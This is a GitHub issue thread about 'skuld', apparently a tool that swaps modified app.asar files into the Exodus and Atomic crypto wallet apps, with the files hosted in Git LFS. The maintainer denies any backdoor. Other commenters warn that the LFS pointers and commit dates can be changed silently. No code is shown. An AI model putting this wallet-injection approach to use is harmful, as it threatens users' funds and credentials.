hackirby
commented
1 month ago I use Git LFS to manage modified app.asar files because they are quite large.
I find it more efficient to directly store these files for users rather than unpacking them on users' computers, modifying the code, and then repacking them. This approach helps to ensure that the program doesn't encounter issues if Exodus or Atomic updates and remove code blocks skuld would replace.
Rest assured, there are no backdoors in the hosted files. You can verify this using the command line examples I've provided in wallets-injection repository.
I have no intention of including malware, however, I understand your concern. If you prefer, you can host the app.asar files yourself on your own GitHub repository to ensure they remain secure.
likely backdoored with the way it loads those external asar modules that are 60bs/120mbs. it is hard to have a clue what could be happening inside those modules. be wary.
Those modules are fetched dynamically when you run the code.
Problem is, there is no files there. When you git clone this repo and cat the module you get:
The exodus.asar file you're seeing is one of these pointer files. It's a small text file that contains metadata about the actual large file, including its size, a unique identifier (oid), and the URL of the LFS server where the actual file content is stored (version https://git-lfs.github.com/spec/v1).
Problem is this reference
Can be changed at any given time by git pushing -f the repo at https://github.com/hackirby/wallets-injection
Dates can be faked so you will never know when it was changed, it can be changed any given day, commit date can be modified. Now it says it was last changed 7 months ago, but truth is it could've been changed at any time.
Nice scheme though!